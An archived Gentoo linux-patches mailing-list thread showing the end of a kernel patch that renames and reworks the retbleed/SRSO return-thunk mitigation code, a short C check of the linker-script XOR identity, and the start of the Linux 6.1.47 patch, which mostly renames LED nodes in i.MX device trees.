+ 	 * With SMT enabled and STIBP active, a sibling thread cannot poison
+ 	 * RET's prediction to a type of its choice, but can evict the
+ 	 * prediction due to competitive sharing. If the prediction is
+-	 * evicted, __x86_return_thunk will suffer Straight Line Speculation
++	 * evicted, retbleed_return_thunk will suffer Straight Line Speculation
+ 	 * which will be contained safely by the INT3.
+ 	 */
+-SYM_INNER_LABEL(__ret, SYM_L_GLOBAL)
++SYM_INNER_LABEL(retbleed_return_thunk, SYM_L_GLOBAL)
+ 	ret
+ 	int3
+-SYM_CODE_END(__ret)
++SYM_CODE_END(retbleed_return_thunk)
+ 
+ 	/*
+ 	 * Ensure the TEST decoding / BTB invalidation is complete.
+@@ -173,16 +204,16 @@ SYM_CODE_END(__ret)
+ 	 * Jump back and execute the RET in the middle of the TEST instruction.
+ 	 * INT3 is for SLS protection.
+ 	 */
+-	jmp __ret
++	jmp retbleed_return_thunk
+ 	int3
+-SYM_FUNC_END(zen_untrain_ret)
+-__EXPORT_THUNK(zen_untrain_ret)
++SYM_FUNC_END(retbleed_untrain_ret)
++__EXPORT_THUNK(retbleed_untrain_ret)
+ 
+ /*
+- * SRSO untraining sequence for Zen1/2, similar to zen_untrain_ret()
++ * SRSO untraining sequence for Zen1/2, similar to retbleed_untrain_ret()
+  * above. On kernel entry, srso_untrain_ret() is executed which is a
+  *
+- * movabs $0xccccccc308c48348,%rax
++ * movabs $0xccccc30824648d48,%rax
+  *
+  * and when the return thunk executes the inner label srso_safe_ret()
+  * later, it is a stack manipulation and a RET which is mispredicted and
+@@ -194,22 +225,44 @@ SYM_START(srso_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	.byte 0x48, 0xb8
+ 
++/*
++ * This forces the function return instruction to speculate into a trap
++ * (UD2 in srso_return_thunk() below).  This RET will then mispredict
++ * and execution will continue at the return site read from the top of
++ * the stack.
++ */
+ SYM_INNER_LABEL(srso_safe_ret, SYM_L_GLOBAL)
+-	add $8, %_ASM_SP
++	lea 8(%_ASM_SP), %_ASM_SP
+ 	ret
+ 	int3
+ 	int3
+-	int3
++	/* end of movabs */
+ 	lfence
+ 	call srso_safe_ret
+-	int3
++	ud2
+ SYM_CODE_END(srso_safe_ret)
+ SYM_FUNC_END(srso_untrain_ret)
+ __EXPORT_THUNK(srso_untrain_ret)
+ 
+-SYM_FUNC_START(__x86_return_thunk)
+-	ALTERNATIVE_2 "jmp __ret", "call srso_safe_ret", X86_FEATURE_SRSO, \
+-			"call srso_safe_ret_alias", X86_FEATURE_SRSO_ALIAS
++SYM_CODE_START(srso_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	call srso_safe_ret
++	ud2
++SYM_CODE_END(srso_return_thunk)
++
++SYM_FUNC_START(entry_untrain_ret)
++	ALTERNATIVE_2 "jmp retbleed_untrain_ret", \
++		      "jmp srso_untrain_ret", X86_FEATURE_SRSO, \
++		      "jmp srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
++SYM_FUNC_END(entry_untrain_ret)
++__EXPORT_THUNK(entry_untrain_ret)
++
++SYM_CODE_START(__x86_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	ANNOTATE_UNRET_SAFE
++	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+ EXPORT_SYMBOL(__x86_return_thunk)
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index a60c5efe34b36..29c35279c7ed8 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -799,5 +799,5 @@ bool arch_is_rethunk(struct symbol *sym)
+ 	return !strcmp(sym->name, "__x86_return_thunk") ||
+ 	       !strcmp(sym->name, "srso_untrain_ret") ||
+ 	       !strcmp(sym->name, "srso_safe_ret") ||
+-	       !strcmp(sym->name, "__ret");
++	       !strcmp(sym->name, "retbleed_return_thunk");
+ }
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index c2c350933a237..913bd361c3684 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -379,7 +379,7 @@ static int decode_instructions(struct objtool_file *file)
+ 
+ 		if (!strcmp(sec->name, ".noinstr.text") ||
+ 		    !strcmp(sec->name, ".entry.text") ||
+-		    !strncmp(sec->name, ".text.__x86.", 12))
++		    !strncmp(sec->name, ".text..__x86.", 13))
+ 			sec->noinstr = true;
+ 
+ 		for (offset = 0; offset < sec->sh.sh_size; offset += insn->len) {
+@@ -1430,7 +1430,7 @@ static int add_jump_destinations(struct objtool_file *file)
+ 			struct symbol *sym = find_symbol_by_offset(dest_sec, dest_off);
+ 
+ 			/*
+-			 * This is a special case for zen_untrain_ret().
++			 * This is a special case for retbleed_untrain_ret().
+ 			 * It jumps to __x86_return_thunk(), but objtool
+ 			 * can't find the thunk's starting RET
+ 			 * instruction, because the RET is also in the
+@@ -2450,12 +2450,17 @@ static int decode_sections(struct objtool_file *file)
+ 	return 0;
+ }
+ 
+-static bool is_fentry_call(struct instruction *insn)
++static bool is_special_call(struct instruction *insn)
+ {
+-	if (insn->type == INSN_CALL &&
+-	    insn->call_dest &&
+-	    insn->call_dest->fentry)
+-		return true;
++	if (insn->type == INSN_CALL) {
++		struct symbol *dest = insn->call_dest;
++
++		if (!dest)
++			return false;
++
++		if (dest->fentry)
++			return true;
++	}
+ 
+ 	return false;
+ }
+@@ -3448,7 +3453,7 @@ static int validate_branch(struct objtool_file *file, struct symbol *func,
+ 			if (ret)
+ 				return ret;
+ 
+-			if (opts.stackval && func && !is_fentry_call(insn) &&
++			if (opts.stackval && func && !is_special_call(insn) &&
+ 			    !has_valid_stack_frame(&state)) {
+ 				WARN_FUNC("call without frame pointer save/setup",
+ 					  sec, insn->offset);
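
The linker-script assertion above leans on a small identity: for any two
addresses A and B, (A | B) - (A & B) == A ^ B, so requiring that difference
to equal (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20) forces
srso_alias_untrain_ret() and srso_alias_safe_ret() to differ in exactly
bits 2, 8, 14 and 20 of their virtual addresses, which is the Zen3/4
BTB-collision condition described in the retpoline.S comments. A tiny
self-check with made-up addresses (only the bit relation matters):

    #include <assert.h>
    #include <stdint.h>

    #define SRSO_ALIAS_BITS \
            (((uint64_t)1 << 2) | (1 << 8) | (1 << 14) | (1 << 20))

    int main(void)
    {
            /* Hypothetical pair in one 2M page, per the comments above. */
            uint64_t untrain = 0xffffffff82000000ULL;
            uint64_t safe    = untrain | SRSO_ALIAS_BITS;

            /* The form a linker script can compute without a ^ operator. */
            assert(((untrain | safe) - (untrain & safe)) ==
                   (untrain ^ safe));
            assert((untrain ^ safe) == SRSO_ALIAS_BITS);
            return 0;
    }

The subtraction form matters because the script cannot simply XOR the two
symbols; it computes the XOR as (A | B) - (A & B) instead, exactly as the
vmlinux.lds.S comment in the hunk explains.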


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-23 18:08 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-23 18:08 UTC (permalink / raw
  To: gentoo-commits

commit:     ebb4944c0658d818673b757eea7c32d00ad5523e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 23 18:08:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 23 18:08:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ebb4944c

Linux patch 6.1.47

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1046_linux-6.1.47.patch | 8047 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8051 insertions(+)

diff --git a/0000_README b/0000_README
index c1bcb313..0ad2cca2 100644
--- a/0000_README
+++ b/0000_README
@@ -227,6 +227,10 @@ Patch:  1045_linux-6.1.46.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.46
 
+Patch:  1046_linux-6.1.47.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.47
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1046_linux-6.1.47.patch b/1046_linux-6.1.47.patch
new file mode 100644
index 00000000..ab31fe98
--- /dev/null
+++ b/1046_linux-6.1.47.patch
@@ -0,0 +1,8047 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 286be425f3bfa..882b6198dd0d1 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -323,6 +323,7 @@
+ 				       option with care.
+ 			pgtbl_v1     - Use v1 page table for DMA-API (Default).
+ 			pgtbl_v2     - Use v2 page table for DMA-API.
++			irtcachedis  - Disable Interrupt Remapping Table (IRT) caching.
+ 
+ 	amd_iommu_dump=	[HW,X86-64]
+ 			Enable AMD IOMMU driver option to dump the ACPI table
+diff --git a/Makefile b/Makefile
+index bdb965177db52..375efcfb91f8f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 46
++SUBLEVEL = 47
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx50-kobo-aura.dts b/arch/arm/boot/dts/imx50-kobo-aura.dts
+index 51bf6117fb124..467db6b4ed7f8 100644
+--- a/arch/arm/boot/dts/imx50-kobo-aura.dts
++++ b/arch/arm/boot/dts/imx50-kobo-aura.dts
+@@ -26,7 +26,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 
+-		on {
++		led-on {
+ 			label = "kobo_aura:orange:on";
+ 			gpios = <&gpio6 24 GPIO_ACTIVE_LOW>;
+ 			panic-indicator;
+diff --git a/arch/arm/boot/dts/imx53-cx9020.dts b/arch/arm/boot/dts/imx53-cx9020.dts
+index cfb18849a92b4..055d23a9aee7c 100644
+--- a/arch/arm/boot/dts/imx53-cx9020.dts
++++ b/arch/arm/boot/dts/imx53-cx9020.dts
+@@ -86,27 +86,27 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		pwr-r {
++		led-pwr-r {
+ 			gpios = <&gpio3 22 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 		};
+ 
+-		pwr-g {
++		led-pwr-g {
+ 			gpios = <&gpio3 24 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+ 		};
+ 
+-		pwr-b {
++		led-pwr-b {
+ 			gpios = <&gpio3 23 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 		};
+ 
+-		sd1-b {
++		led-sd1-b {
+ 			linux,default-trigger = "mmc0";
+ 			gpios = <&gpio3 20 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		sd2-b {
++		led-sd2-b {
+ 			linux,default-trigger = "mmc1";
+ 			gpios = <&gpio3 17 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx53-m53evk.dts b/arch/arm/boot/dts/imx53-m53evk.dts
+index a1a6228d1aa66..2bd2432d317ff 100644
+--- a/arch/arm/boot/dts/imx53-m53evk.dts
++++ b/arch/arm/boot/dts/imx53-m53evk.dts
+@@ -52,13 +52,13 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&led_pin_gpio>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio2 8 0>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio2 9 0>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx53-m53menlo.dts b/arch/arm/boot/dts/imx53-m53menlo.dts
+index d5c68d1ea707c..4d77b6077fc1b 100644
+--- a/arch/arm/boot/dts/imx53-m53menlo.dts
++++ b/arch/arm/boot/dts/imx53-m53menlo.dts
+@@ -34,19 +34,19 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "TestLed601";
+ 			gpios = <&gpio6 1 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "mmc0";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "TestLed602";
+ 			gpios = <&gpio6 2 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		eth {
++		led-eth {
+ 			label = "EthLedYe";
+ 			gpios = <&gpio2 11 GPIO_ACTIVE_LOW>;
+ 			linux,default-trigger = "netdev";
+diff --git a/arch/arm/boot/dts/imx53-tx53.dtsi b/arch/arm/boot/dts/imx53-tx53.dtsi
+index 892dd1a4bac35..a439a47fb65ac 100644
+--- a/arch/arm/boot/dts/imx53-tx53.dtsi
++++ b/arch/arm/boot/dts/imx53-tx53.dtsi
+@@ -94,7 +94,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_stk5led>;
+ 
+-		user {
++		led-user {
+ 			label = "Heartbeat";
+ 			gpios = <&gpio2 20 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx53-usbarmory.dts b/arch/arm/boot/dts/imx53-usbarmory.dts
+index f34993a490ee8..acc44010d5106 100644
+--- a/arch/arm/boot/dts/imx53-usbarmory.dts
++++ b/arch/arm/boot/dts/imx53-usbarmory.dts
+@@ -67,7 +67,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "LED";
+ 			gpios = <&gpio4 27 GPIO_ACTIVE_LOW>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi b/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
+index 337db29b0010a..37697fac9dea9 100644
+--- a/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
++++ b/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
+@@ -211,17 +211,17 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_q7_gpio1 &pinctrl_q7_gpio3 &pinctrl_q7_gpio5>;
+ 
+-		alarm1 {
++		led-alarm1 {
+ 			label = "alarm:red";
+ 			gpios = <&gpio1 8 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		alarm2 {
++		led-alarm2 {
+ 			label = "alarm:yellow";
+ 			gpios = <&gpio4 27 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		alarm3 {
++		led-alarm3 {
+ 			label = "alarm:blue";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6dl-prtrvt.dts b/arch/arm/boot/dts/imx6dl-prtrvt.dts
+index 56bb1ca56a2df..36b031236e475 100644
+--- a/arch/arm/boot/dts/imx6dl-prtrvt.dts
++++ b/arch/arm/boot/dts/imx6dl-prtrvt.dts
+@@ -124,6 +124,10 @@
+ 	status = "disabled";
+ };
+ 
++&usbotg {
++	disable-over-current;
++};
++
+ &vpu {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm/boot/dts/imx6dl-riotboard.dts b/arch/arm/boot/dts/imx6dl-riotboard.dts
+index e7be05f205d32..24c7f535f63bd 100644
+--- a/arch/arm/boot/dts/imx6dl-riotboard.dts
++++ b/arch/arm/boot/dts/imx6dl-riotboard.dts
+@@ -25,14 +25,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio5 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio3 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+index 52162e8c7274b..aacbf317feea6 100644
+--- a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
++++ b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+@@ -274,7 +274,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		chan@0 {
++		led@0 {
+ 			chan-name = "R";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+@@ -282,7 +282,7 @@
+ 			color = <LED_COLOR_ID_RED>;
+ 		};
+ 
+-		chan@1 {
++		led@1 {
+ 			chan-name = "G";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+@@ -290,7 +290,7 @@
+ 			color = <LED_COLOR_ID_GREEN>;
+ 		};
+ 
+-		chan@2 {
++		led@2 {
+ 			chan-name = "B";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+diff --git a/arch/arm/boot/dts/imx6q-gw5400-a.dts b/arch/arm/boot/dts/imx6q-gw5400-a.dts
+index e894faba571f9..522a51042965a 100644
+--- a/arch/arm/boot/dts/imx6q-gw5400-a.dts
++++ b/arch/arm/boot/dts/imx6q-gw5400-a.dts
+@@ -34,20 +34,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* 102 -> MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 10 GPIO_ACTIVE_HIGH>; /* 106 -> MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* 111 -> MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-h100.dts b/arch/arm/boot/dts/imx6q-h100.dts
+index b8feadbff967d..6406ade14f57b 100644
+--- a/arch/arm/boot/dts/imx6q-h100.dts
++++ b/arch/arm/boot/dts/imx6q-h100.dts
+@@ -76,19 +76,19 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_h100_leds>;
+ 
+-		led0: power {
++		led0: led-power {
+ 			label = "power";
+ 			gpios = <&gpio3 0 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+ 		};
+ 
+-		led1: stream {
++		led1: led-stream {
+ 			label = "stream";
+ 			gpios = <&gpio2 29 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 		};
+ 
+-		led2: rec {
++		led2: led-rec {
+ 			label = "rec";
+ 			gpios = <&gpio2 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-kp.dtsi b/arch/arm/boot/dts/imx6q-kp.dtsi
+index 1ade0bff681d6..5e0ed55600405 100644
+--- a/arch/arm/boot/dts/imx6q-kp.dtsi
++++ b/arch/arm/boot/dts/imx6q-kp.dtsi
+@@ -66,14 +66,14 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		green {
++		led-green {
+ 			label = "led1";
+ 			gpios = <&gpio3 16 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "gpio";
+ 			default-state = "off";
+ 		};
+ 
+-		red {
++		led-red {
+ 			label = "led0";
+ 			gpios = <&gpio3 23 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "gpio";
+diff --git a/arch/arm/boot/dts/imx6q-marsboard.dts b/arch/arm/boot/dts/imx6q-marsboard.dts
+index cc18010023942..2c9961333b0a8 100644
+--- a/arch/arm/boot/dts/imx6q-marsboard.dts
++++ b/arch/arm/boot/dts/imx6q-marsboard.dts
+@@ -73,14 +73,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "imx6:green:user1";
+ 			gpios = <&gpio5 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "imx6:green:user2";
+ 			gpios = <&gpio3 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-tbs2910.dts b/arch/arm/boot/dts/imx6q-tbs2910.dts
+index 8daef65d5bb35..2f576e2ce73f2 100644
+--- a/arch/arm/boot/dts/imx6q-tbs2910.dts
++++ b/arch/arm/boot/dts/imx6q-tbs2910.dts
+@@ -49,7 +49,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		blue {
++		led-blue {
+ 			label = "blue_status_led";
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_HIGH>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6qdl-emcon.dtsi b/arch/arm/boot/dts/imx6qdl-emcon.dtsi
+index 7228b894a763f..ee2dd75cead6d 100644
+--- a/arch/arm/boot/dts/imx6qdl-emcon.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-emcon.dtsi
+@@ -46,14 +46,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_som_leds>;
+ 
+-		green {
++		led-green {
+ 			label = "som:green";
+ 			gpios = <&gpio3 0 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 			default-state = "on";
+ 		};
+ 
+-		red {
++		led-red {
+ 			label = "som:red";
+ 			gpios = <&gpio3 1 GPIO_ACTIVE_LOW>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
+index 069c27fab432c..e75e1a5364b85 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
+index 728810b9d677d..47d9a8d08197d 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
+@@ -80,20 +80,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
+index 6c0c109046d80..fb1d29abe0991 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
+@@ -80,20 +80,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
+index a9b04f9f1c2bc..4e20cb97058eb 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
+@@ -81,20 +81,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw551x.dtsi b/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
+index 435dec6338fe6..0fa4b8eeddee7 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
+@@ -115,7 +115,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw552x.dtsi b/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
+index 2e61102ae6946..77ae611b817a4 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
+@@ -72,20 +72,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw553x.dtsi b/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
+index 4662408b225a5..7f16c602cc075 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
+@@ -113,14 +113,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 10 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 11 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+index 4b81a975c979d..46cf4080fec38 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+@@ -139,20 +139,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
